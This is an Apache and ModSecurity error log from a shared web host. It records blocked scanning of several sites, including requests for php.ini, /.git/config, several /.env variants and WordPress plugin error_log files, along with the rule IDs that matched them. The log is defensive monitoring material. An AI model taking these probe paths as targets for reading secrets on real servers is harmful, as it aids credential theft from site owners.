[Mon May 11 16:50:49.718599 2026] [authz_core:error] [pid 1411099:tid 1411118] [client 62.113.117.240:50468] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/wordpress-seo/src/task-list/domain/tasks/error_log
[Mon May 11 16:50:51.214976 2026] [authz_core:error] [pid 1411099:tid 1411118] [client 62.113.117.240:50468] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/wordpress-seo/src/task-list/domain/tasks/error_log
[Mon May 11 16:50:52.745464 2026] [authz_core:error] [pid 1411099:tid 1411118] [client 62.113.117.240:50468] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/wordpress-seo/src/task-list/infrastructure/endpoints/error_log
[Mon May 11 16:50:54.325731 2026] [authz_core:error] [pid 1411099:tid 1411118] [client 62.113.117.240:50468] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/wordpress-seo/src/task-list/infrastructure/endpoints/error_log
[Mon May 11 16:50:55.148089 2026] [security2:error] [pid 1424905:tid 1424910] [client 216.73.216.110:25933] ModSecurity: Warning. Matched phrase "usr/local/lib/php.ini" at ARGS:filesrc. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "41"] [id "930120"] [rev "4"] [msg "OS File Access Attempt"] [data "Matched Data: usr/local/lib/php.ini found within ARGS:filesrc: /usr/local/lib/php.ini,v"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] [unique_id "agHsz4W8yzYoWG_eyCWgswAAAUI"]
[Mon May 11 16:50:55.150007 2026] [security2:error] [pid 1424905:tid 1424910] [client 216.73.216.110:25933] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] [unique_id "agHsz4W8yzYoWG_eyCWgswAAAUI"]
[Mon May 11 16:50:55.246885 2026] [security2:error] [pid 1424905:tid 1424910] [client 216.73.216.110:25933] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): OS File Access Attempt"] [tag "event-correlation"] [hostname "www.missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agHsz4W8yzYoWG_eyCWgswAAAUI"]
[Mon May 11 16:50:55.785887 2026] [authz_core:error] [pid 1411099:tid 1411118] [client 62.113.117.240:50468] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/wordpress-seo/src/task-list/infrastructure/endpoints/error_log
[Mon May 11 16:50:57.292884 2026] [authz_core:error] [pid 1411099:tid 1411118] [client 62.113.117.240:50468] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/wordpress-seo/src/task-list/infrastructure/endpoints/error_log
[Mon May 11 16:50:58.830964 2026] [authz_core:error] [pid 1411099:tid 1411118] [client 62.113.117.240:50468] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/wordpress-seo/src/user-meta/framework/custom-meta/error_log
[Mon May 11 16:51:00.671735 2026] [authz_core:error] [pid 1411099:tid 1411118] [client 62.113.117.240:50468] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/wordpress-seo/src/user-meta/framework/custom-meta/error_log
[Mon May 11 16:51:01.846125 2026] [:error] [pid 1416109:tid 1416154] [client 20.15.224.207:47016] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 16:51:02.364836 2026] [authz_core:error] [pid 1411099:tid 1411118] [client 62.113.117.240:50468] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/wordpress-seo/src/user-meta/framework/custom-meta/error_log
[Mon May 11 16:51:03.952005 2026] [authz_core:error] [pid 1411099:tid 1411118] [client 62.113.117.240:50468] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/wordpress-seo/src/user-meta/framework/custom-meta/error_log
[Mon May 11 16:51:05.470964 2026] [authz_core:error] [pid 1411099:tid 1411118] [client 62.113.117.240:50468] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/wordpress-seo/vendor_prefixed/guzzlehttp/guzzle/src/error_log
[Mon May 11 16:51:06.911569 2026] [authz_core:error] [pid 1411099:tid 1411118] [client 62.113.117.240:50468] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/wordpress-seo/vendor_prefixed/guzzlehttp/guzzle/src/error_log
[Mon May 11 16:51:08.399886 2026] [authz_core:error] [pid 1411099:tid 1411118] [client 62.113.117.240:50468] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/wordpress-seo/vendor_prefixed/guzzlehttp/guzzle/src/error_log
[Mon May 11 16:51:09.846840 2026] [authz_core:error] [pid 1411099:tid 1411118] [client 62.113.117.240:50468] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/wordpress-seo/vendor_prefixed/guzzlehttp/guzzle/src/error_log
[Mon May 11 16:51:11.486847 2026] [authz_core:error] [pid 1411099:tid 1411118] [client 62.113.117.240:50468] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/wordpress-seo/vendor_prefixed/guzzlehttp/guzzle/src/Cookie/error_log
[Mon May 11 16:51:13.104969 2026] [authz_core:error] [pid 1411099:tid 1411118] [client 62.113.117.240:50468] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/wordpress-seo/vendor_prefixed/guzzlehttp/promises/src/error_log
[Mon May 11 16:51:14.695346 2026] [authz_core:error] [pid 1411099:tid 1411118] [client 62.113.117.240:50468] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/wordpress-seo/vendor_prefixed/guzzlehttp/promises/src/error_log
[Mon May 11 16:51:16.152309 2026] [authz_core:error] [pid 1411099:tid 1411118] [client 62.113.117.240:50468] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/wordpress-seo/vendor_prefixed/guzzlehttp/promises/src/error_log
[Mon May 11 16:51:17.640246 2026] [authz_core:error] [pid 1411099:tid 1411118] [client 62.113.117.240:50468] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/wordpress-seo/vendor_prefixed/guzzlehttp/promises/src/error_log
[Mon May 11 16:51:26.030501 2026] [authz_core:error] [pid 1411055:tid 1411081] [client 62.113.117.240:55408] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/wordpress-seo/vendor_prefixed/league/oauth2-client/src/Grant/error_log
[Mon May 11 16:51:27.619334 2026] [authz_core:error] [pid 1411055:tid 1411081] [client 62.113.117.240:55408] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/wordpress-seo/vendor_prefixed/league/oauth2-client/src/Grant/error_log
[Mon May 11 16:51:29.206925 2026] [authz_core:error] [pid 1411055:tid 1411081] [client 62.113.117.240:55408] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/wordpress-seo/vendor_prefixed/league/oauth2-client/src/Grant/error_log
[Mon May 11 16:51:30.824273 2026] [authz_core:error] [pid 1411055:tid 1411081] [client 62.113.117.240:55408] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/wordpress-seo/vendor_prefixed/league/oauth2-client/src/Grant/error_log
[Mon May 11 16:51:32.496569 2026] [authz_core:error] [pid 1411055:tid 1411081] [client 62.113.117.240:55408] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/wordpress-seo/vendor_prefixed/league/oauth2-client/src/OptionProvider/error_log
[Mon May 11 16:51:34.446619 2026] [authz_core:error] [pid 1411055:tid 1411081] [client 62.113.117.240:55408] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/wordpress-seo/vendor_prefixed/league/oauth2-client/src/OptionProvider/error_log
[Mon May 11 16:51:36.320037 2026] [authz_core:error] [pid 1411055:tid 1411081] [client 62.113.117.240:55408] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/wordpress-seo/vendor_prefixed/league/oauth2-client/src/OptionProvider/error_log
[Mon May 11 16:51:37.954298 2026] [authz_core:error] [pid 1411055:tid 1411081] [client 62.113.117.240:55408] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/wordpress-seo/vendor_prefixed/league/oauth2-client/src/OptionProvider/error_log
[Mon May 11 16:51:39.559829 2026] [authz_core:error] [pid 1411055:tid 1411081] [client 62.113.117.240:55408] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/wordpress-seo/vendor_prefixed/league/oauth2-client/src/Provider/error_log
[Mon May 11 16:51:41.013078 2026] [authz_core:error] [pid 1411055:tid 1411081] [client 62.113.117.240:55408] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/wordpress-seo/vendor_prefixed/league/oauth2-client/src/Provider/error_log
[Mon May 11 16:51:42.518454 2026] [authz_core:error] [pid 1411055:tid 1411081] [client 62.113.117.240:55408] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/wordpress-seo/vendor_prefixed/league/oauth2-client/src/Provider/error_log
[Mon May 11 16:51:42.691956 2026] [autoindex:error] [pid 1416109:tid 1416140] [client 45.205.1.8:60116] AH01276: Cannot serve directory /home/totalcloud/public_html/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Mon May 11 16:51:43.336554 2026] [:error] [pid 1411099:tid 1411113] [client 45.205.1.8:60130] File does not exist: /home/totalcloud/public_html/index.php, referer: http://217.113.192.26:443/
[Mon May 11 16:51:44.001353 2026] [authz_core:error] [pid 1411055:tid 1411081] [client 62.113.117.240:55408] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/wordpress-seo/vendor_prefixed/league/oauth2-client/src/Token/error_log
[Mon May 11 16:51:45.607909 2026] [authz_core:error] [pid 1411055:tid 1411081] [client 62.113.117.240:55408] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/wp-mail-smtp/src/Compatibility/Plugin/error_log
[Mon May 11 16:51:47.223517 2026] [authz_core:error] [pid 1411055:tid 1411081] [client 62.113.117.240:55408] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/wp-mail-smtp/src/Compatibility/Plugin/error_log
[Mon May 11 16:51:48.759059 2026] [authz_core:error] [pid 1411055:tid 1411081] [client 62.113.117.240:55408] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/wp-mail-smtp/src/Compatibility/Plugin/error_log
[Mon May 11 16:51:50.388325 2026] [authz_core:error] [pid 1411055:tid 1411081] [client 62.113.117.240:55408] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/wp-mail-smtp/src/Compatibility/Plugin/error_log
[Mon May 11 16:51:52.022844 2026] [authz_core:error] [pid 1411055:tid 1411081] [client 62.113.117.240:55408] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/wp-mail-smtp/src/Providers/ElasticEmail/error_log
[Mon May 11 16:51:53.633445 2026] [authz_core:error] [pid 1411055:tid 1411081] [client 62.113.117.240:55408] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/wp-mail-smtp/src/Providers/ElasticEmail/error_log
[Mon May 11 16:51:55.203170 2026] [authz_core:error] [pid 1411055:tid 1411081] [client 62.113.117.240:55408] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/wp-mail-smtp/src/Providers/ElasticEmail/error_log
[Mon May 11 16:51:56.714102 2026] [authz_core:error] [pid 1411055:tid 1411081] [client 62.113.117.240:55408] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/wp-mail-smtp/src/Providers/ElasticEmail/error_log
[Mon May 11 16:51:58.293888 2026] [authz_core:error] [pid 1411055:tid 1411081] [client 62.113.117.240:55408] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/wp-mail-smtp/src/Providers/Gmail/error_log
[Mon May 11 16:52:10.367054 2026] [authz_core:error] [pid 1416109:tid 1416151] [client 47.128.125.91:46742] AH01630: client denied by server configuration: /home/maelbail/public_html/wp-includes/SimplePie/error_log
[Mon May 11 16:52:27.677014 2026] [security2:error] [pid 1411099:tid 1411111] [client 43.133.220.37:48328] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "piregwan-genesis.com"] [uri "/"] [unique_id "agHtKw-Qm4vhlWBPlMjC3AAAAAs"], referer: http://piregwan-genesis.com
[Mon May 11 16:53:21.393683 2026] [security2:error] [pid 1412074:tid 1412091] [client 216.73.216.117:19032] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd362bb717735fe172830775c597c72e||1778512999||1778512639"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/sitemap_index.xml"] [unique_id "agHtYTJnyuKVXoStDha9aAAAAE8"]
[Mon May 11 16:53:21.394797 2026] [security2:error] [pid 1412074:tid 1412091] [client 216.73.216.117:19032] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/sitemap_index.xml"] [unique_id "agHtYTJnyuKVXoStDha9aAAAAE8"]
[Mon May 11 16:53:21.905964 2026] [security2:error] [pid 1412074:tid 1412091] [client 216.73.216.117:19032] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agHtYTJnyuKVXoStDha9aAAAAE8"]
[Mon May 11 16:54:05.780193 2026] [authz_core:error] [pid 1411055:tid 1411081] [client 75.119.155.172:55920] AH01630: client denied by server configuration: /home/castigli/public_html/wp-content/plugins/wordpress-seo/vendor_prefixed/ruckusing/lib/Ruckusing/Adapter/MySQL/error_log
[Mon May 11 16:54:07.302930 2026] [authz_core:error] [pid 1412074:tid 1412099] [client 75.119.155.172:5094] AH01630: client denied by server configuration: /home/castigli/public_html/wp-content/plugins/wordpress-seo/vendor_prefixed/ruckusing/lib/Ruckusing/Adapter/MySQL/error_log
[Mon May 11 16:54:08.685827 2026] [authz_core:error] [pid 1411099:tid 1411112] [client 75.119.155.172:5110] AH01630: client denied by server configuration: /home/castigli/public_html/wp-content/plugins/wordpress-seo/vendor_prefixed/ruckusing/lib/Ruckusing/Adapter/MySQL/error_log
[Mon May 11 16:54:10.043888 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/.git/config"] [unique_id "agHtkoW8yzYoWG_eyCWhxgAAAVI"]
[Mon May 11 16:54:10.044286 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/.git/config"] [unique_id "agHtkoW8yzYoWG_eyCWhxgAAAVI"]
[Mon May 11 16:54:10.044629 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/.git/config"] [unique_id "agHtkoW8yzYoWG_eyCWhxgAAAVI"]
[Mon May 11 16:54:10.083361 2026] [authz_core:error] [pid 1411201:tid 1411253] [client 75.119.155.172:5116] AH01630: client denied by server configuration: /home/castigli/public_html/wp-content/plugins/wordpress-seo/vendor_prefixed/ruckusing/lib/Ruckusing/Adapter/MySQL/error_log
[Mon May 11 16:54:10.306828 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/.env"] [unique_id "agHtkoW8yzYoWG_eyCWhyAAAAVI"]
[Mon May 11 16:54:10.307037 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/.env"] [unique_id "agHtkoW8yzYoWG_eyCWhyAAAAVI"]
[Mon May 11 16:54:10.307275 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/.env"] [unique_id "agHtkoW8yzYoWG_eyCWhyAAAAVI"]
[Mon May 11 16:54:10.505280 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/.env.local"] [unique_id "agHtkoW8yzYoWG_eyCWhyQAAAVI"]
[Mon May 11 16:54:10.505508 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/.env.local"] [unique_id "agHtkoW8yzYoWG_eyCWhyQAAAVI"]
[Mon May 11 16:54:10.505752 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/.env.local"] [unique_id "agHtkoW8yzYoWG_eyCWhyQAAAVI"]
[Mon May 11 16:54:10.644107 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/.env.production"] [unique_id "agHtkoW8yzYoWG_eyCWhygAAAVI"]
[Mon May 11 16:54:10.644332 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/.env.production"] [unique_id "agHtkoW8yzYoWG_eyCWhygAAAVI"]
[Mon May 11 16:54:10.644563 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/.env.production"] [unique_id "agHtkoW8yzYoWG_eyCWhygAAAVI"]
[Mon May 11 16:54:10.808910 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.staging"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/.env.staging"] [unique_id "agHtkoW8yzYoWG_eyCWhywAAAVI"]
[Mon May 11 16:54:10.809137 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/.env.staging"] [unique_id "agHtkoW8yzYoWG_eyCWhywAAAVI"]
[Mon May 11 16:54:10.809379 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/.env.staging"] [unique_id "agHtkoW8yzYoWG_eyCWhywAAAVI"]
[Mon May 11 16:54:10.988122 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.development"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/.env.development"] [unique_id "agHtkoW8yzYoWG_eyCWhzAAAAVI"]
